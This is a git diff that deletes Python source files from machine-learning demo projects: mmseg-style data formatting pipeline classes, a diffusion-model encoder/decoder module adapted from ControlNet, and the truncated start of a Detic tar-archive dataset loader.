- """ - - for key in self.keys: - img = results[key] - if len(img.shape) < 3: - img = np.expand_dims(img, -1) - results[key] = to_tensor(img.transpose(2, 0, 1)) - return results - - def __repr__(self): - return self.__class__.__name__ + f'(keys={self.keys})' - - -@PIPELINES.register_module() -class Transpose(object): - """Transpose some results by given keys. - - Args: - keys (Sequence[str]): Keys of results to be transposed. - order (Sequence[int]): Order of transpose. - """ - - def __init__(self, keys, order): - self.keys = keys - self.order = order - - def __call__(self, results): - """Call function to convert image in results to :obj:`torch.Tensor` and - transpose the channel order. - - Args: - results (dict): Result dict contains the image data to convert. - - Returns: - dict: The result dict contains the image converted - to :obj:`torch.Tensor` and transposed to (C, H, W) order. - """ - - for key in self.keys: - results[key] = results[key].transpose(self.order) - return results - - def __repr__(self): - return self.__class__.__name__ + \ - f'(keys={self.keys}, order={self.order})' - - -@PIPELINES.register_module() -class ToDataContainer(object): - """Convert results to :obj:`mmcv.DataContainer` by given fields. - - Args: - fields (Sequence[dict]): Each field is a dict like - ``dict(key='xxx', **kwargs)``. The ``key`` in result will - be converted to :obj:`mmcv.DataContainer` with ``**kwargs``. - Default: ``(dict(key='img', stack=True), - dict(key='gt_semantic_seg'))``. - """ - - def __init__(self, - fields=(dict(key='img', - stack=True), dict(key='gt_semantic_seg'))): - self.fields = fields - - def __call__(self, results): - """Call function to convert data in results to - :obj:`mmcv.DataContainer`. - - Args: - results (dict): Result dict contains the data to convert. - - Returns: - dict: The result dict contains the data converted to - :obj:`mmcv.DataContainer`. 
- """ - - for field in self.fields: - field = field.copy() - key = field.pop('key') - results[key] = DC(results[key], **field) - return results - - def __repr__(self): - return self.__class__.__name__ + f'(fields={self.fields})' - - -@PIPELINES.register_module() -class DefaultFormatBundle(object): - """Default formatting bundle. - - It simplifies the pipeline of formatting common fields, including "img" - and "gt_semantic_seg". These fields are formatted as follows. - - - img: (1)transpose, (2)to tensor, (3)to DataContainer (stack=True) - - gt_semantic_seg: (1)unsqueeze dim-0 (2)to tensor, - (3)to DataContainer (stack=True) - """ - - def __call__(self, results): - """Call function to transform and format common fields in results. - - Args: - results (dict): Result dict contains the data to convert. - - Returns: - dict: The result dict contains the data that is formatted with - default bundle. - """ - - if 'img' in results: - img = results['img'] - if len(img.shape) < 3: - img = np.expand_dims(img, -1) - img = np.ascontiguousarray(img.transpose(2, 0, 1)) - results['img'] = DC(to_tensor(img), stack=True) - if 'gt_semantic_seg' in results: - # convert to long - results['gt_semantic_seg'] = DC( - to_tensor(results['gt_semantic_seg'][None, - ...].astype(np.int64)), - stack=True) - return results - - def __repr__(self): - return self.__class__.__name__ - - -@PIPELINES.register_module() -class Collect(object): - """Collect data from the loader relevant to the specific task. - - This is usually the last stage of the data loader pipeline. Typically keys - is set to some subset of "img", "gt_semantic_seg". - - The "img_meta" item is always populated. The contents of the "img_meta" - dictionary depends on "meta_keys". By default this includes: - - - "img_shape": shape of the image input to the network as a tuple - (h, w, c). Note that images may be zero padded on the bottom/right - if the batch tensor is larger than this shape. 
- - - "scale_factor": a float indicating the preprocessing scale - - - "flip": a boolean indicating if image flip transform was used - - - "filename": path to the image file - - - "ori_shape": original shape of the image as a tuple (h, w, c) - - - "pad_shape": image shape after padding - - - "img_norm_cfg": a dict of normalization information: - - mean - per channel mean subtraction - - std - per channel std divisor - - to_rgb - bool indicating if bgr was converted to rgb - - Args: - keys (Sequence[str]): Keys of results to be collected in ``data``. - meta_keys (Sequence[str], optional): Meta keys to be converted to - ``mmcv.DataContainer`` and collected in ``data[img_metas]``. - Default: ``('filename', 'ori_filename', 'ori_shape', 'img_shape', - 'pad_shape', 'scale_factor', 'flip', 'flip_direction', - 'img_norm_cfg')`` - """ - - def __init__(self, - keys, - meta_keys=('filename', 'ori_filename', 'ori_shape', - 'img_shape', 'pad_shape', 'scale_factor', 'flip', - 'flip_direction', 'img_norm_cfg')): - self.keys = keys - self.meta_keys = meta_keys - - def __call__(self, results): - """Call function to collect keys in results. The keys in ``meta_keys`` - will be converted to :obj:mmcv.DataContainer. - - Args: - results (dict): Result dict contains the data to collect. 
- - Returns: - dict: The result dict contains the following keys - - keys in``self.keys`` - - ``img_metas`` - """ - - data = {} - img_meta = {} - for key in self.meta_keys: - img_meta[key] = results[key] - data['img_metas'] = DC(img_meta, cpu_only=True) - for key in self.keys: - data[key] = results[key] - return data - - def __repr__(self): - return self.__class__.__name__ + \ - f'(keys={self.keys}, meta_keys={self.meta_keys})' diff --git a/spaces/abhishek/sketch-to-image/lib/model.py b/spaces/abhishek/sketch-to-image/lib/model.py deleted file mode 100644 index fa2b4c5082211b91023df971fd02560fac452ec6..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/lib/model.py +++ /dev/null @@ -1,862 +0,0 @@ -''' - * Copyright (c) 2023 Salesforce, Inc. - * All rights reserved. - * SPDX-License-Identifier: Apache License 2.0 - * For full license text, see LICENSE.txt file in the repo root or http://www.apache.org/licenses/ - * By Can Qin - * Modified from ControlNet repo: https://github.com/lllyasviel/ControlNet - * Copyright (c) 2023 Lvmin Zhang and Maneesh Agrawala -''' - -# pytorch_diffusion + derived encoder decoder -import math -import torch -import torch.nn as nn -import numpy as np -from einops import rearrange -from typing import Optional, Any - -from lib.attention import MemoryEfficientCrossAttention - -try: - import xformers - import xformers.ops - XFORMERS_IS_AVAILBLE = True -except: - XFORMERS_IS_AVAILBLE = False - print("No module 'xformers'. Proceeding without it.") - - -def get_timestep_embedding(timesteps, embedding_dim): - """ - This matches the implementation in Denoising Diffusion Probabilistic Models: - From Fairseq. - Build sinusoidal embeddings. - This matches the implementation in tensor2tensor, but differs slightly - from the description in Section 3.5 of "Attention Is All You Need". 
- """ - assert len(timesteps.shape) == 1 - - half_dim = embedding_dim // 2 - emb = math.log(10000) / (half_dim - 1) - emb = torch.exp(torch.arange(half_dim, dtype=torch.float32) * -emb) - emb = emb.to(device=timesteps.device) - emb = timesteps.float()[:, None] * emb[None, :] - emb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1) - if embedding_dim % 2 == 1: # zero pad - emb = torch.nn.functional.pad(emb, (0,1,0,0)) - return emb - - -def nonlinearity(x): - # swish - return x*torch.sigmoid(x) - - -def Normalize(in_channels, num_groups=32): - return torch.nn.GroupNorm(num_groups=num_groups, num_channels=in_channels, eps=1e-6, affine=True) - - -class Upsample(nn.Module): - def __init__(self, in_channels, with_conv): - super().__init__() - self.with_conv = with_conv - if self.with_conv: - self.conv = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - x = torch.nn.functional.interpolate(x, scale_factor=2.0, mode="nearest") - if self.with_conv: - x = self.conv(x) - return x - - -class Downsample(nn.Module): - def __init__(self, in_channels, with_conv): - super().__init__() - self.with_conv = with_conv - if self.with_conv: - # no asymmetric padding in torch conv, must do it ourselves - self.conv = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=3, - stride=2, - padding=0) - - def forward(self, x): - if self.with_conv: - pad = (0,1,0,1) - x = torch.nn.functional.pad(x, pad, mode="constant", value=0) - x = self.conv(x) - else: - x = torch.nn.functional.avg_pool2d(x, kernel_size=2, stride=2) - return x - - -class ResnetBlock(nn.Module): - def __init__(self, *, in_channels, out_channels=None, conv_shortcut=False, - dropout, temb_channels=512): - super().__init__() - self.in_channels = in_channels - out_channels = in_channels if out_channels is None else out_channels - self.out_channels = out_channels - self.use_conv_shortcut = conv_shortcut - - self.norm1 = Normalize(in_channels) - self.conv1 = 
torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - if temb_channels > 0: - self.temb_proj = torch.nn.Linear(temb_channels, - out_channels) - self.norm2 = Normalize(out_channels) - self.dropout = torch.nn.Dropout(dropout) - self.conv2 = torch.nn.Conv2d(out_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - if self.in_channels != self.out_channels: - if self.use_conv_shortcut: - self.conv_shortcut = torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - else: - self.nin_shortcut = torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=1, - stride=1, - padding=0) - - def forward(self, x, temb): - h = x - h = self.norm1(h) - h = nonlinearity(h) - h = self.conv1(h) - - if temb is not None: - h = h + self.temb_proj(nonlinearity(temb))[:,:,None,None] - - h = self.norm2(h) - h = nonlinearity(h) - h = self.dropout(h) - h = self.conv2(h) - - if self.in_channels != self.out_channels: - if self.use_conv_shortcut: - x = self.conv_shortcut(x) - else: - x = self.nin_shortcut(x) - - return x+h - - -class AttnBlock(nn.Module): - def __init__(self, in_channels): - super().__init__() - self.in_channels = in_channels - - self.norm = Normalize(in_channels) - self.q = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.k = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.v = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.proj_out = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - - def forward(self, x): - h_ = x - h_ = self.norm(h_) - q = self.q(h_) - k = self.k(h_) - v = self.v(h_) - - # compute attention - b,c,h,w = q.shape - q = q.reshape(b,c,h*w) - q = q.permute(0,2,1) # b,hw,c - k = k.reshape(b,c,h*w) # b,c,hw - w_ = torch.bmm(q,k) # b,hw,hw w[b,i,j]=sum_c q[b,i,c]k[b,c,j] - w_ = w_ * (int(c)**(-0.5)) - w_ = 
torch.nn.functional.softmax(w_, dim=2) - - # attend to values - v = v.reshape(b,c,h*w) - w_ = w_.permute(0,2,1) # b,hw,hw (first hw of k, second of q) - h_ = torch.bmm(v,w_) # b, c,hw (hw of q) h_[b,c,j] = sum_i v[b,c,i] w_[b,i,j] - h_ = h_.reshape(b,c,h,w) - - h_ = self.proj_out(h_) - - return x+h_ - -class MemoryEfficientAttnBlock(nn.Module): - """ - Uses xformers efficient implementation, - see https://github.com/MatthieuTPHR/diffusers/blob/d80b531ff8060ec1ea982b65a1b8df70f73aa67c/src/diffusers/models/attention.py#L223 - Note: this is a single-head self-attention operation - """ - # - def __init__(self, in_channels): - super().__init__() - self.in_channels = in_channels - - self.norm = Normalize(in_channels) - self.q = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.k = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.v = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.proj_out = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.attention_op: Optional[Any] = None - - def forward(self, x): - h_ = x - h_ = self.norm(h_) - q = self.q(h_) - k = self.k(h_) - v = self.v(h_) - - # compute attention - B, C, H, W = q.shape - q, k, v = map(lambda x: rearrange(x, 'b c h w -> b (h w) c'), (q, k, v)) - - q, k, v = map( - lambda t: t.unsqueeze(3) - .reshape(B, t.shape[1], 1, C) - .permute(0, 2, 1, 3) - .reshape(B * 1, t.shape[1], C) - .contiguous(), - (q, k, v), - ) - out = xformers.ops.memory_efficient_attention(q, k, v, attn_bias=None, op=self.attention_op) - - out = ( - out.unsqueeze(0) - .reshape(B, 1, out.shape[1], C) - .permute(0, 2, 1, 3) - .reshape(B, out.shape[1], C) - ) - out = rearrange(out, 'b (h w) c -> b c h w', b=B, h=H, w=W, c=C) - out = self.proj_out(out) - return x+out - - -class MemoryEfficientCrossAttentionWrapper(MemoryEfficientCrossAttention): - def forward(self, x, context=None, 
mask=None):
-        b, c, h, w = x.shape
-        x = rearrange(x, 'b c h w -> b (h w) c')
-        out = super().forward(x, context=context, mask=mask)
-        out = rearrange(out, 'b (h w) c -> b c h w', h=h, w=w, c=c)
-        return x + out
-
-
-def make_attn(in_channels, attn_type="vanilla", attn_kwargs=None):
-    assert attn_type in ["vanilla", "vanilla-xformers", "memory-efficient-cross-attn", "linear", "none"], f'attn_type {attn_type} unknown'
-    if XFORMERS_IS_AVAILBLE and attn_type == "vanilla":
-        attn_type = "vanilla-xformers"
-    print(f"making attention of type '{attn_type}' with {in_channels} in_channels")
-    if attn_type == "vanilla":
-        assert attn_kwargs is None
-        return AttnBlock(in_channels)
-    elif attn_type == "vanilla-xformers":
-        print(f"building MemoryEfficientAttnBlock with {in_channels} in_channels...")
-        return MemoryEfficientAttnBlock(in_channels)
-    elif attn_type == "memory-efficient-cross-attn":
-        attn_kwargs["query_dim"] = in_channels
-        return MemoryEfficientCrossAttentionWrapper(**attn_kwargs)
-    elif attn_type == "none":
-        return nn.Identity(in_channels)
-    else:
-        raise NotImplementedError()
-
-
-class Model(nn.Module):
-    def __init__(self, *, ch, out_ch, ch_mult=(1,2,4,8), num_res_blocks,
-                 attn_resolutions, dropout=0.0, resamp_with_conv=True, in_channels,
-                 resolution, use_timestep=True, use_linear_attn=False, attn_type="vanilla"):
-        super().__init__()
-        if use_linear_attn: attn_type = "linear"
-        self.ch = ch
-        self.temb_ch = self.ch*4
-        self.num_resolutions = len(ch_mult)
-        self.num_res_blocks = num_res_blocks
-        self.resolution = resolution
-        self.in_channels = in_channels
-
-        self.use_timestep = use_timestep
-        if self.use_timestep:
-            # timestep embedding
-            self.temb = nn.Module()
-            self.temb.dense = nn.ModuleList([
-                torch.nn.Linear(self.ch,
-                                self.temb_ch),
-                torch.nn.Linear(self.temb_ch,
-                                self.temb_ch),
-            ])
-
-        # downsampling
-        self.conv_in = torch.nn.Conv2d(in_channels,
-                                       self.ch,
-                                       kernel_size=3,
-                                       stride=1,
-                                       padding=1)
-
-        curr_res = resolution
-        in_ch_mult = 
(1,)+tuple(ch_mult) - self.down = nn.ModuleList() - for i_level in range(self.num_resolutions): - block = nn.ModuleList() - attn = nn.ModuleList() - block_in = ch*in_ch_mult[i_level] - block_out = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks): - block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - down = nn.Module() - down.block = block - down.attn = attn - if i_level != self.num_resolutions-1: - down.downsample = Downsample(block_in, resamp_with_conv) - curr_res = curr_res // 2 - self.down.append(down) - - # middle - self.mid = nn.Module() - self.mid.block_1 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - self.mid.attn_1 = make_attn(block_in, attn_type=attn_type) - self.mid.block_2 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - - # upsampling - self.up = nn.ModuleList() - for i_level in reversed(range(self.num_resolutions)): - block = nn.ModuleList() - attn = nn.ModuleList() - block_out = ch*ch_mult[i_level] - skip_in = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks+1): - if i_block == self.num_res_blocks: - skip_in = ch*in_ch_mult[i_level] - block.append(ResnetBlock(in_channels=block_in+skip_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - up = nn.Module() - up.block = block - up.attn = attn - if i_level != 0: - up.upsample = Upsample(block_in, resamp_with_conv) - curr_res = curr_res * 2 - self.up.insert(0, up) # prepend to get consistent order - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - out_ch, - kernel_size=3, - stride=1, - 
padding=1) - - def forward(self, x, t=None, context=None): - #assert x.shape[2] == x.shape[3] == self.resolution - if context is not None: - # assume aligned context, cat along channel axis - x = torch.cat((x, context), dim=1) - if self.use_timestep: - # timestep embedding - assert t is not None - temb = get_timestep_embedding(t, self.ch) - temb = self.temb.dense[0](temb) - temb = nonlinearity(temb) - temb = self.temb.dense[1](temb) - else: - temb = None - - # downsampling - hs = [self.conv_in(x)] - for i_level in range(self.num_resolutions): - for i_block in range(self.num_res_blocks): - h = self.down[i_level].block[i_block](hs[-1], temb) - if len(self.down[i_level].attn) > 0: - h = self.down[i_level].attn[i_block](h) - hs.append(h) - if i_level != self.num_resolutions-1: - hs.append(self.down[i_level].downsample(hs[-1])) - - # middle - h = hs[-1] - h = self.mid.block_1(h, temb) - h = self.mid.attn_1(h) - h = self.mid.block_2(h, temb) - - # upsampling - for i_level in reversed(range(self.num_resolutions)): - for i_block in range(self.num_res_blocks+1): - h = self.up[i_level].block[i_block]( - torch.cat([h, hs.pop()], dim=1), temb) - if len(self.up[i_level].attn) > 0: - h = self.up[i_level].attn[i_block](h) - if i_level != 0: - h = self.up[i_level].upsample(h) - - # end - h = self.norm_out(h) - h = nonlinearity(h) - h = self.conv_out(h) - return h - - def get_last_layer(self): - return self.conv_out.weight - - -class Encoder(nn.Module): - def __init__(self, *, ch, out_ch, ch_mult=(1,2,4,8), num_res_blocks, - attn_resolutions, dropout=0.0, resamp_with_conv=True, in_channels, - resolution, z_channels, double_z=True, use_linear_attn=False, attn_type="vanilla", - **ignore_kwargs): - super().__init__() - if use_linear_attn: attn_type = "linear" - self.ch = ch - self.temb_ch = 0 - self.num_resolutions = len(ch_mult) - self.num_res_blocks = num_res_blocks - self.resolution = resolution - self.in_channels = in_channels - - # downsampling - self.conv_in = 
torch.nn.Conv2d(in_channels, - self.ch, - kernel_size=3, - stride=1, - padding=1) - - curr_res = resolution - in_ch_mult = (1,)+tuple(ch_mult) - self.in_ch_mult = in_ch_mult - self.down = nn.ModuleList() - for i_level in range(self.num_resolutions): - block = nn.ModuleList() - attn = nn.ModuleList() - block_in = ch*in_ch_mult[i_level] - block_out = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks): - block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - down = nn.Module() - down.block = block - down.attn = attn - if i_level != self.num_resolutions-1: - down.downsample = Downsample(block_in, resamp_with_conv) - curr_res = curr_res // 2 - self.down.append(down) - - # middle - self.mid = nn.Module() - self.mid.block_1 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - self.mid.attn_1 = make_attn(block_in, attn_type=attn_type) - self.mid.block_2 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - 2*z_channels if double_z else z_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - # timestep embedding - temb = None - - # downsampling - hs = [self.conv_in(x)] - for i_level in range(self.num_resolutions): - for i_block in range(self.num_res_blocks): - h = self.down[i_level].block[i_block](hs[-1], temb) - if len(self.down[i_level].attn) > 0: - h = self.down[i_level].attn[i_block](h) - hs.append(h) - if i_level != self.num_resolutions-1: - hs.append(self.down[i_level].downsample(hs[-1])) - - # middle - h = hs[-1] - h = self.mid.block_1(h, temb) - h = self.mid.attn_1(h) - h = self.mid.block_2(h, temb) - - # end - h = self.norm_out(h) - h = 
nonlinearity(h) - h = self.conv_out(h) - return h - - -class Decoder(nn.Module): - def __init__(self, *, ch, out_ch, ch_mult=(1,2,4,8), num_res_blocks, - attn_resolutions, dropout=0.0, resamp_with_conv=True, in_channels, - resolution, z_channels, give_pre_end=False, tanh_out=False, use_linear_attn=False, - attn_type="vanilla", **ignorekwargs): - super().__init__() - if use_linear_attn: attn_type = "linear" - self.ch = ch - self.temb_ch = 0 - self.num_resolutions = len(ch_mult) - self.num_res_blocks = num_res_blocks - self.resolution = resolution - self.in_channels = in_channels - self.give_pre_end = give_pre_end - self.tanh_out = tanh_out - - # compute in_ch_mult, block_in and curr_res at lowest res - in_ch_mult = (1,)+tuple(ch_mult) - block_in = ch*ch_mult[self.num_resolutions-1] - curr_res = resolution // 2**(self.num_resolutions-1) - self.z_shape = (1,z_channels,curr_res,curr_res) - print("Working with z of shape {} = {} dimensions.".format( - self.z_shape, np.prod(self.z_shape))) - - # z to block_in - self.conv_in = torch.nn.Conv2d(z_channels, - block_in, - kernel_size=3, - stride=1, - padding=1) - - # middle - self.mid = nn.Module() - self.mid.block_1 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - self.mid.attn_1 = make_attn(block_in, attn_type=attn_type) - self.mid.block_2 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - - # upsampling - self.up = nn.ModuleList() - for i_level in reversed(range(self.num_resolutions)): - block = nn.ModuleList() - attn = nn.ModuleList() - block_out = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks+1): - block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - up = nn.Module() - up.block = block - up.attn = 
attn - if i_level != 0: - up.upsample = Upsample(block_in, resamp_with_conv) - curr_res = curr_res * 2 - self.up.insert(0, up) # prepend to get consistent order - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - out_ch, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, z): - #assert z.shape[1:] == self.z_shape[1:] - self.last_z_shape = z.shape - - # timestep embedding - temb = None - - # z to block_in - h = self.conv_in(z) - - # middle - h = self.mid.block_1(h, temb) - h = self.mid.attn_1(h) - h = self.mid.block_2(h, temb) - - # upsampling - for i_level in reversed(range(self.num_resolutions)): - for i_block in range(self.num_res_blocks+1): - h = self.up[i_level].block[i_block](h, temb) - if len(self.up[i_level].attn) > 0: - h = self.up[i_level].attn[i_block](h) - if i_level != 0: - h = self.up[i_level].upsample(h) - - # end - if self.give_pre_end: - return h - - h = self.norm_out(h) - h = nonlinearity(h) - h = self.conv_out(h) - if self.tanh_out: - h = torch.tanh(h) - return h - - -class SimpleDecoder(nn.Module): - def __init__(self, in_channels, out_channels, *args, **kwargs): - super().__init__() - self.model = nn.ModuleList([nn.Conv2d(in_channels, in_channels, 1), - ResnetBlock(in_channels=in_channels, - out_channels=2 * in_channels, - temb_channels=0, dropout=0.0), - ResnetBlock(in_channels=2 * in_channels, - out_channels=4 * in_channels, - temb_channels=0, dropout=0.0), - ResnetBlock(in_channels=4 * in_channels, - out_channels=2 * in_channels, - temb_channels=0, dropout=0.0), - nn.Conv2d(2*in_channels, in_channels, 1), - Upsample(in_channels, with_conv=True)]) - # end - self.norm_out = Normalize(in_channels) - self.conv_out = torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - for i, layer in enumerate(self.model): - if i in [1,2,3]: - x = layer(x, None) - else: - x = layer(x) - - h = self.norm_out(x) - h = nonlinearity(h) - x = 
self.conv_out(h) - return x - - -class UpsampleDecoder(nn.Module): - def __init__(self, in_channels, out_channels, ch, num_res_blocks, resolution, - ch_mult=(2,2), dropout=0.0): - super().__init__() - # upsampling - self.temb_ch = 0 - self.num_resolutions = len(ch_mult) - self.num_res_blocks = num_res_blocks - block_in = in_channels - curr_res = resolution // 2 ** (self.num_resolutions - 1) - self.res_blocks = nn.ModuleList() - self.upsample_blocks = nn.ModuleList() - for i_level in range(self.num_resolutions): - res_block = [] - block_out = ch * ch_mult[i_level] - for i_block in range(self.num_res_blocks + 1): - res_block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - self.res_blocks.append(nn.ModuleList(res_block)) - if i_level != self.num_resolutions - 1: - self.upsample_blocks.append(Upsample(block_in, True)) - curr_res = curr_res * 2 - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - out_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - # upsampling - h = x - for k, i_level in enumerate(range(self.num_resolutions)): - for i_block in range(self.num_res_blocks + 1): - h = self.res_blocks[i_level][i_block](h, None) - if i_level != self.num_resolutions - 1: - h = self.upsample_blocks[k](h) - h = self.norm_out(h) - h = nonlinearity(h) - h = self.conv_out(h) - return h - - -class LatentRescaler(nn.Module): - def __init__(self, factor, in_channels, mid_channels, out_channels, depth=2): - super().__init__() - # residual block, interpolate, residual block - self.factor = factor - self.conv_in = nn.Conv2d(in_channels, - mid_channels, - kernel_size=3, - stride=1, - padding=1) - self.res_block1 = nn.ModuleList([ResnetBlock(in_channels=mid_channels, - out_channels=mid_channels, - temb_channels=0, - dropout=0.0) for _ in range(depth)]) - self.attn = AttnBlock(mid_channels) - self.res_block2 = 
nn.ModuleList([ResnetBlock(in_channels=mid_channels, - out_channels=mid_channels, - temb_channels=0, - dropout=0.0) for _ in range(depth)]) - - self.conv_out = nn.Conv2d(mid_channels, - out_channels, - kernel_size=1, - ) - - def forward(self, x): - x = self.conv_in(x) - for block in self.res_block1: - x = block(x, None) - x = torch.nn.functional.interpolate(x, size=(int(round(x.shape[2]*self.factor)), int(round(x.shape[3]*self.factor)))) - x = self.attn(x) - for block in self.res_block2: - x = block(x, None) - x = self.conv_out(x) - return x - - -class MergedRescaleEncoder(nn.Module): - def __init__(self, in_channels, ch, resolution, out_ch, num_res_blocks, - attn_resolutions, dropout=0.0, resamp_with_conv=True, - ch_mult=(1,2,4,8), rescale_factor=1.0, rescale_module_depth=1): - super().__init__() - intermediate_chn = ch * ch_mult[-1] - self.encoder = Encoder(in_channels=in_channels, num_res_blocks=num_res_blocks, ch=ch, ch_mult=ch_mult, - z_channels=intermediate_chn, double_z=False, resolution=resolution, - attn_resolutions=attn_resolutions, dropout=dropout, resamp_with_conv=resamp_with_conv, - out_ch=None) - self.rescaler = LatentRescaler(factor=rescale_factor, in_channels=intermediate_chn, - mid_channels=intermediate_chn, out_channels=out_ch, depth=rescale_module_depth) - - def forward(self, x): - x = self.encoder(x) - x = self.rescaler(x) - return x - - -class MergedRescaleDecoder(nn.Module): - def __init__(self, z_channels, out_ch, resolution, num_res_blocks, attn_resolutions, ch, ch_mult=(1,2,4,8), - dropout=0.0, resamp_with_conv=True, rescale_factor=1.0, rescale_module_depth=1): - super().__init__() - tmp_chn = z_channels*ch_mult[-1] - self.decoder = Decoder(out_ch=out_ch, z_channels=tmp_chn, attn_resolutions=attn_resolutions, dropout=dropout, - resamp_with_conv=resamp_with_conv, in_channels=None, num_res_blocks=num_res_blocks, - ch_mult=ch_mult, resolution=resolution, ch=ch) - self.rescaler = LatentRescaler(factor=rescale_factor, in_channels=z_channels, 
mid_channels=tmp_chn,
-                                       out_channels=tmp_chn, depth=rescale_module_depth)
-
-    def forward(self, x):
-        x = self.rescaler(x)
-        x = self.decoder(x)
-        return x
-
-
-class Upsampler(nn.Module):
-    def __init__(self, in_size, out_size, in_channels, out_channels, ch_mult=2):
-        super().__init__()
-        assert out_size >= in_size
-        num_blocks = int(np.log2(out_size//in_size))+1
-        factor_up = 1.+ (out_size % in_size)
-        print(f"Building {self.__class__.__name__} with in_size: {in_size} --> out_size {out_size} and factor {factor_up}")
-        self.rescaler = LatentRescaler(factor=factor_up, in_channels=in_channels, mid_channels=2*in_channels,
-                                       out_channels=in_channels)
-        self.decoder = Decoder(out_ch=out_channels, resolution=out_size, z_channels=in_channels, num_res_blocks=2,
-                               attn_resolutions=[], in_channels=None, ch=in_channels,
-                               ch_mult=[ch_mult for _ in range(num_blocks)])
-
-    def forward(self, x):
-        x = self.rescaler(x)
-        x = self.decoder(x)
-        return x
-
-
-class Resize(nn.Module):
-    def __init__(self, in_channels=None, learned=False, mode="bilinear"):
-        super().__init__()
-        self.with_conv = learned
-        self.mode = mode
-        if self.with_conv:
-            print(f"Note: {self.__class__.__name__} uses learned downsampling and will ignore the fixed {mode} mode")
-            raise NotImplementedError()
-            assert in_channels is not None
-            # no asymmetric padding in torch conv, must do it ourselves
-            self.conv = torch.nn.Conv2d(in_channels,
-                                        in_channels,
-                                        kernel_size=4,
-                                        stride=2,
-                                        padding=1)
-
-    def forward(self, x, scale_factor=1.0):
-        if scale_factor==1.0:
-            return x
-        else:
-            x = torch.nn.functional.interpolate(x, mode=self.mode, align_corners=False, scale_factor=scale_factor)
-        return x
\ No newline at end of file
diff --git a/spaces/akhaliq/Detic/detic/data/tar_dataset.py b/spaces/akhaliq/Detic/detic/data/tar_dataset.py
deleted file mode 100644
index 0605ba3a96ab80a1212fdb1a3860337d7e7b20cc..0000000000000000000000000000000000000000
--- a/spaces/akhaliq/Detic/detic/data/tar_dataset.py
+++ /dev/null
@@ 
-1,138 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. -import os -import gzip -import numpy as np -import io -from PIL import Image -from torch.utils.data import Dataset - -try: - from PIL import UnidentifiedImageError - - unidentified_error_available = True -except ImportError: - # UnidentifiedImageError isn't available in older versions of PIL - unidentified_error_available = False - -class DiskTarDataset(Dataset): - def __init__(self, - tarfile_path='dataset/imagenet/ImageNet-21k/metadata/tar_files.npy', - tar_index_dir='dataset/imagenet/ImageNet-21k/metadata/tarindex_npy', - preload=False, - num_synsets="all"): - """ - - preload (bool): Recommend to set preload to False when using - - num_synsets (integer or string "all"): set to small number for debugging - will load subset of dataset - """ - tar_files = np.load(tarfile_path) - - chunk_datasets = [] - dataset_lens = [] - if isinstance(num_synsets, int): - assert num_synsets < len(tar_files) - tar_files = tar_files[:num_synsets] - for tar_file in tar_files: - dataset = _TarDataset(tar_file, tar_index_dir, preload=preload) - chunk_datasets.append(dataset) - dataset_lens.append(len(dataset)) - - self.chunk_datasets = chunk_datasets - self.dataset_lens = np.array(dataset_lens).astype(np.int32) - self.dataset_cumsums = 